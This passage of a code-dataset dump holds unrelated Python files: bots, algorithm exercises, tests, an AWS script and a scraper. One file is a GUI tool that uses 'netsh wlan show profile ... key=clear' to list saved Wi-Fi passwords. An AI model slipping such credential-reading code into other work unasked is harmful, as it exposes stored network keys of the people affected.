WHERE guild_id=$2\", None, guild_id)\n await conn.close()\n \n async def get_outdated_configs(self):\n conn = await self.db.get_connection()\n try:\n x = await conn.fetch(\"SELECT * FROM guild_config WHERE bot_removed <= $1\", str(datetime.utcnow()))\n except:\n return None\n await conn.close()\n return x\n \n async def add_every_guild(self, guilds: list):\n for guild in guilds:\n await self.add_guild(guild)\n print(\"Added all guilds to db\")\n \n async def update_guild_name(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_name = $1 WHERE guild_id=$2\", guild.name, guild.id)\n await conn.close()\n \n async def update_guild_members(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_members = $1 WHERE guild_id=$2\", len(guild.members), guild.id)\n await conn.close()\n \n async def update_guild_text(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_text = $1 WHERE guild_id=$2\", len(guild.text_channels), guild.id)\n await conn.close()\n \n async def update_guild_voice(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_voice = $1 WHERE guild_id=$2\", len(guild.voice_channels), guild.id)\n await conn.close()\n \n async def update_guild_roles(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_roles = $1 WHERE guild_id=$2\", len(guild.roles), guild.id)\n await conn.close()","repo_name":"Lemony-Juicy/exult-bot","sub_path":"bot/database/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29874056372","text":"from collections import deque\n\n\ndef check(p, now):\n dr = [1, -1, 0, 0]\n dc = [0, 0, -1, 1]\n visited = [[0] * 5 for _ in range(5)]\n visited[now[0]][now[1]] = 1\n\n q = deque([now])\n while q:\n r, c, l = 
q.popleft()\n # stop expanding once past the distancing limit (distance 2)\n if l == 2:\n continue\n\n for i in range(4):\n nr, nc = r + dr[i], c + dc[i]\n if nr < 0 or nr >= 5 or nc < 0 or nc >= 5:\n continue\n # do not pass through visited cells or partitions\n if visited[nr][nc] or p[nr][nc] == 'X':\n continue\n # return True when another person is reachable\n if p[nr][nc] == 'P':\n return True\n\n visited[nr][nc] = 1\n q.append((nr, nc, l + 1))\n\n return False\n\n\ndef solution(places):\n answer = []\n for place in places:\n stop = False\n for r in range(5):\n if stop:\n break\n for c in range(5):\n if place[r][c] == 'P':\n # if someone violates distancing, append 0 and stop iterating\n if check(place, (r, c, 0)):\n answer.append(0)\n stop = True\n break\n # if the loops were not stopped early, append 1\n if not stop:\n answer.append(1)\n return answer\n\n\nprint(solution([]))\n","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2022/Programmers/Programmers_81302/81302_Programmers.py","file_name":"81302_Programmers.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28731607823","text":"# loop\nprint('loop')\nfor i in '100':\n print(i)\n# loop from 0 to 100\nprint('loop from 0 to 100')\nfor i in range(1, 100):\n if i % 2 == 0:\n break\n print(i)\nprint('while loop')\nsum = 0\nnum = 0\nwhile num < 100:\n sum += num\n num += 1\n print(sum)\n","repo_name":"youxuehu/python-base","sub_path":"py01/hello/循环.py","file_name":"循环.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7118245992","text":"import numpy as np\n\nrho_crit = 8.62*10**-27\nmass_H = 1.672*10**-27\nc = 3*10**8\nH0 = float(68)/float(3.086e19)\nOMm = 0.31\nOMl = 0.75\nbaryon2DMfrac = 0.1\nHy2baryonfrac = 0.75\nHyIGMfrac = 1\nlya_min = 2.5e42\nf12 = 0.4162\ne = 1.602e-19\nme = 9.11e-31\nkb = 1.38064852e-23 #m^2 kg s^-2 K ^-1\nmp = 1.672e-27 #kg\nc = 3.0e8 #m/s\nf_alpha_0 = 2.466e15 #1/s\n\n\n\n \ndef oops_we_are_at_the_edge(y,z, HII_DIM):\n if y == HII_DIM and z == HII_DIM:\n return int(HII_DIM - 1), int(HII_DIM - 1)\n else:\n if y == HII_DIM:\n return int(HII_DIM - 1) , z\n if z == HII_DIM:\n return y, int(HII_DIM - 1)\n\ndef map2box(list_to_map, HII_DIM):\n #HII_DIM is the target resolution of the output map\n Halo_Position_Box = np.zeros((HII_DIM, HII_DIM, HII_DIM))\n Halo_Mass_Box = np.zeros((HII_DIM, HII_DIM, HII_DIM))\n for i in range(list_to_map.shape[0]):\n x, y, z = np.round(HII_DIM*list_to_map[i][1],0), np.round(HII_DIM*list_to_map[i][2],0), np.round(HII_DIM*list_to_map[i][3],0)\n if y == HII_DIM or z == HII_DIM:\n y, z = oops_we_are_at_the_edge(int(y),int(z), HII_DIM )\n if x == HII_DIM or z == HII_DIM:\n x, z = oops_we_are_at_the_edge(int(x),int(z), HII_DIM)\n Halo_Position_Box[int(x)][int(y)][int(z)] += 1\n Halo_Mass_Box[int(x)][int(y)][int(z)] += list_to_map[i][0]\n return Halo_Position_Box , Halo_Mass_Box\n\n\ndef sort_into_slices(list_to_sort, HII_DIM, slice):\n filtered_list = []\n for i in range(list_to_sort.shape[0]):\n if np.round(HII_DIM*list_to_sort[i][1],0) == slice:\n filtered_list.append(list_to_sort[i])\n return np.array(filtered_list)\n\n\ndef remove_los_from_list(list_of_halos, HII_DIM):\n # HII_DIM is a parameter like in the other helpers; this is a module-level function, so self.HII_DIM could never resolve\n filtered_list = []\n for i in range(list_of_halos.shape[0]):\n filtered_list.append((list_of_halos[i][2], HII_DIM*list_of_halos[i][3]))\n return 
np.array(filtered_list)\n","repo_name":"pagano-michael/FRB","sub_path":"misc_functions.py","file_name":"misc_functions.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31346174845","text":"import PySimpleGUI as sg\r\nimport subprocess\r\n\r\ndef redes_info():\r\n try:\r\n comando_netsh = subprocess.check_output(\"netsh wlan show profiles\", encoding=\"cp858\", shell=True)\r\n redes = []\r\n for linha in comando_netsh.split('\\\\n'):\r\n if \"Todos os Perfis de Usuários\" in linha:\r\n posicao_referencia = linha.find(\":\")\r\n rede = linha[posicao_referencia + 2:]\r\n senha = informacao_da_rede(rede)\r\n redes.append(rede + \" - \" + senha)\r\n return redes\r\n except subprocess.CalledProcessError as E:\r\n return [\"Erro ao obter informações\"]\r\n\r\ndef informacao_da_rede(wifi):\r\n try:\r\n comando_netsh = subprocess.check_output([\"netsh\", \"wlan\", \"show\", \"profile\", wifi, \"key\", \"=\", \"clear\"],\r\n encoding=\"cp858\", shell=True)\r\n senha = ''\r\n for linha in comando_netsh.split('\\n'):\r\n if \"Conteúdo da Chave\" in linha:\r\n posicao_referencia = linha.find(\":\")\r\n senha = linha[posicao_referencia + 2:]\r\n break\r\n return senha\r\n except subprocess.CalledProcessError as E:\r\n return \"Confira o nome da rede\"\r\nsg.theme(\"Black\")\r\nlayout = [\r\n [sg.Text(\"Bem vindo! Qual senha você gostaria de saber?\")],\r\n [sg.Input(key='-INPUT-', default_text='Nome da rede')],\r\n [sg.Text(size=(40,1), key='-OUTPUT-')],\r\n [sg.Button('Pesquisar'), sg.Button('Sair')],\r\n [sg.Button('Ver todas as redes')],\r\n [sg.Text('By Leo')]\r\n]\r\n\r\nwindow = sg.Window('Senha do Wifi', layout)\r\n\r\nwhile True:\r\n event, values = window.read()\r\n if event == sg.WINDOW_CLOSED or event == 'Sair':\r\n break\r\n elif event == 'Ver todas as redes':\r\n resultado = redes_info()\r\n if resultado:\r\n sg.popup_scrolled('\\n'.join(resultado), title='Todas as redes')\r\n else:\r\n sg.popup('Nenhuma rede Wi-Fi encontrada.', title='Todas as redes')\r\n elif event == 'Pesquisar':\r\n rede = values['-INPUT-']\r\n senha = informacao_da_rede(rede)\r\n window['-OUTPUT-'].update(f\"Para a rede '{rede}' a senha é: {senha}\")\r\n\r\nwindow.close()\r\n","repo_name":"MaybeLexter/ver_senhas_pelo_comando_subprocess","sub_path":"projeto01_versenhaswifisalvas.py","file_name":"projeto01_versenhaswifisalvas.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37299473024","text":"from collections import defaultdict\n\nclass Solution:\n def getParent(self, parent, x):\n if parent[x] == x:\n return x\n parent[x] = self.getParent(parent, parent[x])\n return parent[x]\n \n def connect(self, parent, a, b):\n parent[self.getParent(parent, a)] = self.getParent(parent, b)\n \n def isConnected(self, parent, a, b):\n return self.getParent(parent, a) == self.getParent(parent, b)\n \n def findAllPeople(self, n: int, meetings: List[List[int]], firstPerson: int) -> List[int]:\n parent = list(range(n))\n meets = defaultdict(list)\n for a, b, t in meetings:\n meets[t].append((a, b))\n self.connect(parent, 0, firstPerson)\n people = set()\n for t in sorted(meets.keys()):\n people.clear()\n for a, b in meets[t]:\n self.connect(parent, a, b)\n people.update({a, b})\n for p in people:\n if not self.isConnected(parent, p, 0):\n parent[p] = p\n return [i for i in range(n) if self.isConnected(parent, i, 
0)]","repo_name":"theabbie/leetcode","sub_path":"find-all-people-with-secret.py","file_name":"find-all-people-with-secret.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"15922260912","text":"print(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\ntotal=name1+name2\ntotal.lower()\nt=total.count('t')\nr=total.count('r')\nu=total.count('u')\ne=total.count('e')\n\nsm=t+r+u+e\n\nl=total.count('l')\no=total.count('o')\nv=total.count('v')\ne=total.count('e')\n\nad=l+o+v+e\n\nto=str(sm)+str(ad)\ntot=int(to)\n\nif tot<10 or tot>90:\n print(f'Your score is {to}, you go together like coke and mentos.')\nif tot>=40 and tot<=50:\n print(f'Your score is {to}, you are alright together.')\nelse:\n print(f'Your score is {to}.')\n","repo_name":"mikeoladapo/Love-caculator","sub_path":"lovecalculator.py","file_name":"lovecalculator.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17576753652","text":"from pyepidoc.epidoc.epidoc import EpiDoc\nfrom pyepidoc.utils import head\nfrom pyepidoc.epidoc.funcs import lang, line\n\nimport pytest\n\nrelative_filepaths = {\n 'ISic000001': 'api/files/single_files_untokenized/ISic000001.xml',\n 'persName_nested': 'api/files/persName_nested.xml',\n 'langs_1': 'api/files/langs_1.xml',\n 'langs_2': 'api/files/langs_2.xml',\n 'langs_3': 'api/files/langs_3.xml',\n 'line_1': 'api/files/line_1.xml',\n 'line_2': 'api/files/line_2.xml',\n 'gap': 'api/files/gap.xml',\n 'comma': 'api/files/comma.xml'\n}\n\n\ndef test_collect_tokens():\n filepath = relative_filepaths['ISic000001']\n doc = EpiDoc(filepath, fullpath=False)\n\n assert doc.tokens_list_str == [\n 'dis', \n 'manibus', \n 'Zethi', \n 'vixit', \n 'annis', \n 'VI'\n ]\n\n\ndef test_expans():\n filepath = relative_filepaths['ISic000001']\n \n doc = EpiDoc(filepath, fullpath=False)\n edition = head(doc.editions())\n\n assert edition != None\n assert len(edition.expan_elems) == 3\n\n\ndef test_langs():\n \"\"\"\n Tests that the collecting of language information happens in the correct way.\n \"\"\"\n\n doc_1 = EpiDoc(relative_filepaths['langs_1'], fullpath=False)\n\n assert doc_1.langs == ['la', 'grc']\n assert lang(head(doc_1.expans)) == 'la'\n assert lang(head(doc_1.tokens)) == 'grc'\n\n doc_2 = EpiDoc(relative_filepaths['langs_2'], fullpath=False)\n assert lang(head(doc_2.expans)) == 'la'\n assert lang(head(doc_2.tokens)) == 'grc'\n\n doc_3 = EpiDoc(relative_filepaths['langs_3'], fullpath=False)\n assert lang(head(doc_3.expans)) == 'la'\n assert lang(head(doc_3.tokens)) == 'grc'\n\n\ndef test_lines():\n doc_1 = EpiDoc(relative_filepaths['line_1'], fullpath=False)\n\n token = head(doc_1.tokens)\n assert line(token).n == '1'\n\n supplied = head(token.supplied)\n assert line(supplied).n == '1'\n\n doc_2 = EpiDoc(relative_filepaths['line_2'], fullpath=False)\n token = head(doc_2.tokens)\n\n assert line(token).n == '1'\n \n second_token = doc_2.tokens[1]\n assert second_token.text_desc == 'ambulavit'\n assert line(second_token).n == '2'\n\n\ndef test_gaps():\n doc = EpiDoc(relative_filepaths['gap'], fullpath=False)\n has_gaps = doc.has_gap(reasons=['lost'])\n assert has_gaps == True\n\n\ndef test_nested():\n doc = EpiDoc(relative_filepaths['persName_nested'], 
fullpath=False)\n assert doc.tokens_list_str == ['Maximus', 'Decimus', 'meridius']\n assert [str(token) for token in doc.w_tokens] == ['meridius']\n\n\ndef test_punct():\n \"\"\"\n Tests that comma is removed from string version of token\n \"\"\"\n doc = EpiDoc(relative_filepaths['comma'], fullpath=False) \n assert str(doc.tokens[0]) == \"hello\"\n\n\n@pytest.mark.parametrize(\"filepath\", relative_filepaths.values())\ndef test_load_relative_filepath_from_str(filepath:str):\n doc = EpiDoc(filepath, fullpath=False)\n assert doc.tokens_list_str != []","repo_name":"rsdc2/PyEpiDoc","sub_path":"tests/api/expected/test_epidoc_intended.py","file_name":"test_epidoc_intended.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41905635421","text":"import logging\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom confiqSQL import TOKEN\r\n\r\nbot = Bot(token=TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n@dp.message_handler(commands=['start'])\r\nasync def process_start(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Здравствуйте.\\nПожалуйста, введите имя пользователя.')\r\n\r\n@dp.message_handler(commands=['commands'])\r\nasync def process_commands(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Вот список моих команд:\\n/start - вернуться к началу\\n/commands - показать все команды\\n/stop - закончить разговор')\r\n\r\n@dp.message_handler(commands=['stop'])\r\nasync def process_stop(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Пока!\\nРад был пообщаться =)')\r\n\r\n@dp.message_handler()\r\nasync def echo(message: types.Message):\r\n # old style:\r\n # await bot.send_message(message.chat.id, message.text)\r\n\r\n await message.answer(message.text)\r\n\r\nif __name__ == '__main__':\r\n executor. 
start_polling(dp, skip_updates=True)\r\n","repo_name":"sigucci/Python","sub_path":"botSQL.py","file_name":"botSQL.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71730799720","text":"import numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\n\ndef collect_data(collectedData, tt, collisions, satParameters, smallFragments, largeFragments, smallFragmentCols,\n largeFragmentCols, counter):\n '''\n Collects various different quantities of the simulation of the kessler syndrome.\n\n Args:\n collectedData (2darray): Measured data.\n tt (int): Iteration step.\n collisions (int): Number of collisions.\n satParameters (2darray): Orbital parameters, period time and active status for each satellite.\n numberOfFragments (int): Total number of fragments.\n counter (int): Counter variable for indices assignment.\n\n Returns:\n collectedData (2darray): Updated measured data.\n '''\n activeSatParameters = satParameters[:, -1] == 1\n inactiveSatParameters = satParameters[:, -1] == 0\n activeSatellites = np.count_nonzero(activeSatParameters)\n inactiveSatellites = np.count_nonzero(inactiveSatParameters)\n totalSatellites = activeSatellites + inactiveSatellites\n\n collectedData[0][counter] = tt\n collectedData[1][counter] = collisions\n collectedData[2][counter] = np.sum(collectedData[1])\n collectedData[3][counter] = totalSatellites\n collectedData[4][counter] = activeSatellites\n collectedData[5][counter] = inactiveSatellites\n collectedData[6][counter] = smallFragments\n collectedData[7][counter] = largeFragments\n collectedData[8][counter] = smallFragmentCols\n collectedData[9][counter] = largeFragmentCols\n\n return collectedData\n\n\ndef plot_data(simulationData):\n '''\n Plots the gathered simulation data.\n Args:\n simulationData (2darray): Measured data.\n\n Returns:\n None.\n '''\n tt = simulationData[0]\n collisionsPerIteration = simulationData[1]\n totalCollisions = simulationData[2]\n totalSatellites = simulationData[3]\n activeSatellites = simulationData[4]\n inactiveSatellites = simulationData[5]\n numberOfFragments = simulationData[6]\n\n fig, axs = plt.subplots(2, 2, figsize=(12, 8))\n\n axs[0, 0].plot(tt, collisionsPerIteration)\n axs[0, 0].set_xlabel('Time')\n axs[0, 0].set_ylabel('Collisions per Iteration')\n axs[0, 0].set_title('Collisions per Iteration')\n\n axs[0, 1].plot(tt, totalCollisions)\n axs[0, 1].set_xlabel('Time')\n axs[0, 1].set_ylabel('Total collisions')\n axs[0, 1].set_title('Collisions over time')\n\n axs[1, 0].plot(tt, activeSatellites, label='active')\n axs[1, 0].plot(tt, inactiveSatellites, label='inactive')\n axs[1, 0].plot(tt, totalSatellites, label='total')\n axs[1, 0].set_xlabel('Time')\n axs[1, 0].set_ylabel('Number of satellites')\n axs[1, 0].set_title('Active and inactive satellites over time')\n axs[1, 0].legend()\n\n axs[1, 1].plot(tt, numberOfFragments)\n axs[1, 1].set_xlabel('Time')\n axs[1, 1].set_ylabel('Number of fragments')\n axs[1, 1].set_title('Fragments over time')\n\n plt.tight_layout()\n currentDir = os.getcwd()\n currentTime = time.strftime(\"%a %b %d %H:%M:%S %Y\") # Get the current time in the desired format\n currentTime = currentTime.replace(\" \", \"_\") # Replace spaces with underscores\n currentTime = currentTime[4:]\n currentTime = currentTime.replace(\":\", \"-\") # Replace colons with hyphens or any other desired character\n saveDir = os.path.join(currentDir, os.path.abspath(\"output/\" + currentTime + 
\".png\"))\n plt.savefig(saveDir, dpi=600)\n","repo_name":"janlucahu/HubaldModel","sub_path":"Python/OrbitalDistance/data_handling.py","file_name":"data_handling.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17865705383","text":"ACCESS_KEY = '@@{cred_aws.username}@@'\nSECRET_KEY = '@@{cred_aws.secret}@@'\nAWS_REGION = '@@{clusters_geolocation}@@'\nINSTANCE_ID = '@@{ec2_instance_id}@@'\n\nimport boto3\n\nboto3.setup_default_session(\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n region_name=AWS_REGION\n)\n\nclient = boto3.client('ec2')\n\ntry:\n # Allocate elatic PublicIp\n allocation = client.allocate_address(Domain='vpc')\n print(\"Allocation Id: \"+ allocation['AllocationId'] + \" Public IP: \" + allocation['PublicIp'])\n\n # Associate Elastic IP with an ec2 instance\n response = client.associate_address(AllocationId=allocation['AllocationId'],\n InstanceId=INSTANCE_ID)\n print(response)\nexcept ClientError as e:\n print(e)\n","repo_name":"nutanix/blueprints","sub_path":"task-library/aws/ec2_associate_elastic_ip.py","file_name":"ec2_associate_elastic_ip.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"38979410377","text":"from Modules import Logger, Guilds\n\nimport random\nimport discord\nfrom discord.ext import commands, tasks\n\nLog = Logger.Get(\"VanityCog\")\n\n\nclass Cog(commands.Cog):\n \"\"\"A cog for handling vanity functions such as Status changes\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n Log.info(\"Initialised\")\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild: discord.Guild):\n \"Announcement that a guild has invited the bot\"\n owner = self.bot.fetch_user(self.bot.owner_id)\n owner.send(f\"Yay, {guild.name} is the {len(self.bot.guilds)}th server.\")\n \n # @tasks.loop(seconds=5)\n # async def ChangeStatus(self):\n # Selection = random.randint(0, len(Statuses) - 1)\n # Activity, Message = Statuses[Selection]\n # # await self.bot.change_presence(activity=Activity(name=Message))\n # Log.debug(f\"Changed presence to status {Selection}\")","repo_name":"Ben-Brady/PureImage","sub_path":"src/Cogs/VanityCog.py","file_name":"VanityCog.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"71290257960","text":"import sys\n\n\ndef input(): return sys.stdin.readline().strip()\n\n\ndef sub_board(board, start_y, end_y, start_x, end_x):\n ret = []\n for y in range(start_y, end_y):\n ret.append([])\n for x in range(start_x, end_x):\n ret[-1].append(board[y][x])\n return ret\n\n\ndef quad(board):\n local_n = len(board)\n\n summation = 0\n for y in range(local_n):\n for x in range(local_n):\n summation = summation + board[y][x]\n\n if summation == 0:\n print(0, end=\"\")\n elif summation == local_n * local_n:\n print(1, end=\"\")\n else:\n mid = local_n // 2\n print(\"(\", end=\"\")\n quad(sub_board(board, 0, mid, 0, mid))\n quad(sub_board(board, 0, mid, mid, local_n))\n quad(sub_board(board, mid, local_n, 0, mid))\n quad(sub_board(board, mid, local_n, mid, local_n))\n print(\")\", end=\"\")\n\n\nn = int(input())\nboard = [[int(x) for x in input()] for _ in 
range(n)]\n\nquad(board)\nprint()\n","repo_name":"greedy0110/algorithm","sub_path":"baekjoon/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34196211015","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, field\nfrom typing import List\n\n\n@dataclass\nclass ThrillistEvent:\n title: str\n link: str\n date: List[str] = field(metadata={\"transform\": \"parse_data\"})\n description: str\n price: str\n\n def __post_init__(self):\n if \"-\" in self.date: # str.find() returns -1 (truthy) when absent, so a membership test is needed here\n self.date = self.date.split(\"-\")\n else:\n self.date = [self.date]\n\n\nLA_URL = \"https://www.thrillist.com/events/los-angeles/things-to-do-in-los-angeles-this-weekend\"\n\n# BASE_URL = \"https://www.thrillist.com\"\n# LOST_ANGELES_URL = \"https://www.thrillist.com/los-angeles\"\n\n# page = requests.get(LOST_ANGELES_URL)\n\n# soup = BeautifulSoup(page.content, \"html.parser\")\n\n# events_headline = soup.find(\"h2\", {\"data-testid\": \"ucc-headline\"})\n\n# print(events_headline.find_parent()[\"href\"])\n\n# LA_events_url = BASE_URL + events_headline.find_parent()[\"href\"]\n\n# print(LA_events_url)\n\n\npage = requests.get(LA_URL)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\ntitle_tags = soup.find_all(\"h2\") # Every event title is wrapped in an h2\n\nevents = []\n\nfor tag in title_tags:\n title = tag.find(\"strong\")\n link = None if not tag.find(\"a\") else tag.find(\"a\").get(\"href\")\n\n print(f\"The link is: {link}\")\n if title:\n event_wrapper_div = title.find_parent(\"div\")\n description = event_wrapper_div.find_next_sibling(\"p\")\n\n date = description.find(\"strong\").text\n location = description.find(\"em\")\n price = description.find_all(string=True)[-1]\n\n # print(price)\n\n event = ThrillistEvent(title, link, date, location, price)\n\n events.append(event) # collect the event; the events list was never populated before\n\n print(event.date)\n\n # print(f\"\\n{description.find(text=True, recursive=False)}\\n\")\n # print(description)\n\n # print(date)\n # print(tag.find(\"strong\"))\n\n# URL = \"https://realpython.github.io/fake-jobs/\"\n# page = requests.get(URL)\n\n# print(page.text)\n\n# soup = BeautifulSoup(page.content, \"html.parser\")\n\n# results = soup.find(id=\"ResultsContainer\")\n\n# # print(results.prettify())\n\n# job_elements = results.find_all(\"div\", class_=\"card-content\")\n\n# for job_element in job_elements:\n# print(job_element, end=\"\\n\" * 2)\n","repo_name":"dkfann/events-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18838949981","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\n###############################\n####### Parameters ############\n###############################\n\noptions = VarParsing ('python')\n\n#options.register('NAME', False,\n#\t\t VarParsing.multiplicity.singleton,\n#\t\t VarParsing.varType.bool,\n#\t\t\t \"Run this on real data\"\n#\t\t\t )\noptions.register('PROC', \n\t\t'RPVSt350tojj_pythia8_13TeV_PU20bx25',\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.string,\n\t\t\"name\"\n\t\t)\n\noptions.register('local', \n\t\tTrue,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.bool,\n\t\t\"Run locally or crab\"\n\t\t)\noptions.register('debug', 
\n\t\tFalse,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.bool,\n\t\t\"Run just pruned\"\n\t\t)\noptions.register('HT', \n\t\t800.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"HT cut\"\n\t\t)\noptions.register('MassRes', \n\t\t0.30,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"MassRes cut\"\n\t\t)\noptions.register('Delta', \n\t\t300.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Delta cut\"\n\t\t)\noptions.register('EtaBand', \n\t\t1.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"EtaBand cut\"\n\t\t)\noptions.register('JetPt', \n\t\t0.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('boostedJetPt', \n\t\t150.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('boostedHT', \n\t\t800.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('Asym', \n\t\t0.1,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Asymmetry cut\"\n\t\t)\noptions.register('CosTheta', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"CosThetaStar cut\"\n\t\t)\noptions.register('SubPt', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Subjet Pt Ratio cut\"\n\t\t)\noptions.register('Tau31', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Tau31 cut\"\n\t\t)\noptions.register('Tau21', \n\t\t0.4,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Tau21 cut\"\n\t\t)\noptions.register('DEta', \n\t\t1.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"DEta cut\"\n\t\t)\noptions.register('btag', \n\t\t#0.244, ## CSVL\n\t\t0.679, ## CSVM\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Btag cut\"\n\t\t)\n\n\n\noptions.parseArguments()\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nNAME = options.PROC\n\nif options.local:\n\tprocess.load(NAME+'_RUNA_cfi')\n\t#process.load('RPVSt100tojj_13TeV_pythia8_RUNtuples_cfi')\nelse:\n\tprocess.source = cms.Source(\"PoolSource\",\n\t fileNames = cms.untracked.vstring(\n\t\t '/store/user/decosa/ttDM/CMSSW_7_4_X/QCD_HT1000to1500_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/QCD_HT1000to1500/150927_053249/0000/B2GEDMNtuple_101.root',\n\t\t '/store/user/algomez/QCD_Pt_1400to1800_TuneCUETP8M1_13TeV_pythia8/RunIISpring15DR74_RUNA_Asympt25ns_v06p1/151001_090133/0000/RUNtuples_100.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_1.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_10.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_100.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_101.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_103.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_104.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_105.root',\n\t\t 
